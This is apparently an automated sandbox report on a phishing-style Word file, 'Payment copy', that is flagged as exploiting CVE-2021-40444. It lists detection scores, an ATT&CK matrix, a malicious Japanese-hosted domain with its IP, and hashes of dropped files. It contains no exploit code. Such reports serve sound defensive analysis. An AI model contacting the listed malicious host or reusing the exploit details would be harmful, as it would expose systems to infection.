Windows
Analysis Report
Payment copy_2911022.docx.doc
Overview
General Information
Detection
Score: | 68 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w7x64
- WINWORD.EXE (PID: 1608 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\WINWOR D.EXE" /Au tomation - Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
EXPL_CVE_2021_40444_Document_Rels_XML | Detects indicators found in weaponized documents that exploit CVE-2021-40444 | Jeremy Brown / @alteredbytes |
|
Click to jump to signature section
AV Detection |
---|
Source: | Avira: |
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link |
Exploits |
---|
Source: | Extracted files from sample: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | File opened: | Jump to behavior |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | File created: | Jump to behavior |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Matched rule: |
Source: | OLE stream indicators for Word, Excel, PowerPoint, and Visio: |
Source: | ReversingLabs: | ||
Source: | Virustotal: |
Source: | Key opened: | Jump to behavior |
Source: | LNK file: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: |
Source: | File read: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Initial sample: |
Persistence and Installation Behavior |
---|
Source: | Extracted files from sample: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 13 Exploitation for Client Execution | Path Interception | Path Interception | 1 Masquerading | OS Credential Dumping | 1 File and Directory Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | 2 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 3 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 14 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 4 Ingress Tool Transfer | SIM Card Swap | Carrier Billing Fraud |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
41% | ReversingLabs | Document-Office.Exploit.CVE-2021-40444 | ||
46% | Virustotal | Browse | ||
100% | Avira | EXP/CVE-2021-40444.Gen |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
pzsrblog.com | 118.27.125.229 | true | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
118.27.125.229 | pzsrblog.com | Japan | 7506 | INTERQGMOInternetIncJP | true |
Joe Sandbox Version: | 36.0.0 Rainbow Opal |
Analysis ID: | 770660 |
Start date and time: | 2022-12-20 14:07:07 +01:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 21s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | Payment copy_2911022.docx.doc |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 6 |
Number of new started drivers analysed: | 1 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal68.expl.evad.winDOC@1/20@7/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
- Report size getting too big, too many NtOpenFile calls found.
- Report size getting too big, too many NtQueryAttributesFile calls found.
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
INTERQGMOInternetIncJP | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
05af1f5ca1b87cc9cc9b25185115607d | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.2880914581185761 |
Encrypted: | false |
SSDEEP: | 48:I3rTGRB0Di+ZizW+BY4dCh0ERieLrEorjO56VcH:K+Li58zWaY6iYA86VcH |
MD5: | B53533125231DD0B586CB6715AE19CB6 |
SHA1: | A9E7566E4BB7CA451B8D9E3559C7F63607A4BD3E |
SHA-256: | 4BC81648A241EC2BC277A80D232691CD168B4DCC768B323D509ECD740BE75CF0 |
SHA-512: | D2F54F0347C2C9BD1268F7958DC3B3B76A8C962D6FC425E3C33D32F9DB142B266DADEB462189677E0CABFB024AAF94F186CC958C3A27D01545E6FA1EF11C8FD1 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{9D741663-0E54-4731-8095-222DB92ACF56}.FSD
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.6693472333421685 |
Encrypted: | false |
SSDEEP: | 96:K3G8RCyr8OairdIwgNOoGzn/iNFD3depKCHf6XZoZGPY/MkfO:jYdmBGT/wFD3depKCHf6XZoZeMMkfO |
MD5: | 5FC240531A725DDD31B36CFC13E5A401 |
SHA1: | AAA4F0EE3AB6F3A36E5D00218E8CA4167B7DE64C |
SHA-256: | 2AC86D569E45C0C59AC8046F7CC2BF0A149F46ED0B92CE93E7FAE2328FD3575A |
SHA-512: | E93C0C34DF4D673203BE4CA5EB1179ED463255EF6084BED59BEC440B3742CFF6A94CAA0424DB968A6ECF580F6F4106ACED5285083F97772C655B8883D516C733 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 114 |
Entropy (8bit): | 4.0043834000059455 |
Encrypted: | false |
SSDEEP: | 3:yVlgsRlz1lDCrrPjlYDYwlVlc3lX3pQlQMDZ276:yPblz1Rsr+YAc3lnLMDZ22 |
MD5: | 29CE4C3AD91CA4ED32D0FE57B495FCC5 |
SHA1: | EFD857E3CAAFBDE2AE85672CFD4DCD99458CF465 |
SHA-256: | E19CB2B28AC900FD40B61E0807007B538CDEE091A0CA82F9A76ED48F997CB7C8 |
SHA-512: | 6AE9097FBAF9A541667BB44C9A5999ECD23A35E2C2291486067D7110960C3F0D35FBD2DF82864EA376456F16D4CF0E510F5AEFB0144FBC3DB061EC68E36FEC8A |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.2866055829360173 |
Encrypted: | false |
SSDEEP: | 48:I31CRB6Cyp8tAgBWZFbQRczx8tbu4WubrfDslgRpcCDC1H:KAL6CyYAgBWr2ceu4WunfQce1H |
MD5: | 8F0A4FA071D865E8A556C2157191813E |
SHA1: | C92BC60B1C41760B7D4768C673AD0A4356FC8ED6 |
SHA-256: | 3406B7EC52AC5F6955F939021B73EB1AFE6938BAB96EB60FEE8E7AD52799997D |
SHA-512: | 8EBCF339C677C2C42FDC9131A5FEBB31D49F928BF7A5C5DA0C0F6B8BC2B6A04644BD5BD2A8381CFF4D66BB9A215E1539EE397FF1DBC2C899A2A28134A328643D |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{FC3E07E1-8ECD-43E4-B52E-9C0E75945771}.FSD
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.22184406153599004 |
Encrypted: | false |
SSDEEP: | 48:I3+3UrBptM1865ZNUgqKS0ip6NIN1ZpIN1Z7:K+3CptivE0jy6NINHpINH7 |
MD5: | 354B23BB2531B0571E7808EF78C2BDDB |
SHA1: | 5959F89837C462172341FB541F34BE8556378E0C |
SHA-256: | C825D9DF8C6FFBC827CF12D1653ABB948DE07317F1EF7D5DD2E66E6B39B78497 |
SHA-512: | 93DD7F49CCB09725D871B6C509721064EE89CA449B92C385610CE6F5F416188E842F556615864906E367C0AFE74880413D86FB53483BB96BFB02013E29471744 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 114 |
Entropy (8bit): | 3.938508180669744 |
Encrypted: | false |
SSDEEP: | 3:yVlgsRlziLVNOlQglm7SwORgQ3ggOSjRYUC/l276:yPblziL/Ol18ew7Q3gajRYUCt22 |
MD5: | 53F7D146048797564ACAEC8B2819EF0B |
SHA1: | 7DCC293F430710EC6929DFA75DDFB1EEC2A867E6 |
SHA-256: | 18FCDCB36C0D51EF510D8A33065F575DDD212BB7D54FF3767D31AE26D2597345 |
SHA-512: | 47EE50ACD25866E2B0EF2E20CA721C126E8D313FB6112F397877A6B12D1E989B79F64FFB930E022226BA5AA179DC4744A8CF3E4B35D2C24A2E665F58B40561FB |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\PROMZwFp385vXr[1]
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8032 |
Entropy (8bit): | 6.106485999431441 |
Encrypted: | false |
SSDEEP: | 96:+Y8gdLn2wOlVE82u5WUqhy0J2bnR5PojA6pAohjN6pKpGPZCzYw9gz1fUIN3U0s:+Y7L2wO9IUNv5PoV6w6peGRx7pE0s |
MD5: | 7934E5C18F2C7C53DCE7C8C7CE55125D |
SHA1: | 8C75630C574D0745E4F3B71B26057C990E2BB467 |
SHA-256: | 7C92FD542BC5E2B201FB2DE4FC1DACE37FF9DFC02CE40FD1BD26E61ED41DB3EA |
SHA-512: | 1E8D31AF033C0E3DF7D4DCF427D92702F733E13CE1686E0E1BDB0711E882F2AE18C479F363A535B366D1A4838E363C163513B7091DD81CBD9961D18C1C293C13 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5E5321AD.tmp
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8032 |
Entropy (8bit): | 6.106485999431441 |
Encrypted: | false |
SSDEEP: | 96:+Y8gdLn2wOlVE82u5WUqhy0J2bnR5PojA6pAohjN6pKpGPZCzYw9gz1fUIN3U0s:+Y7L2wO9IUNv5PoV6w6peGRx7pE0s |
MD5: | 7934E5C18F2C7C53DCE7C8C7CE55125D |
SHA1: | 8C75630C574D0745E4F3B71B26057C990E2BB467 |
SHA-256: | 7C92FD542BC5E2B201FB2DE4FC1DACE37FF9DFC02CE40FD1BD26E61ED41DB3EA |
SHA-512: | 1E8D31AF033C0E3DF7D4DCF427D92702F733E13CE1686E0E1BDB0711E882F2AE18C479F363A535B366D1A4838E363C163513B7091DD81CBD9961D18C1C293C13 |
Malicious: | false |
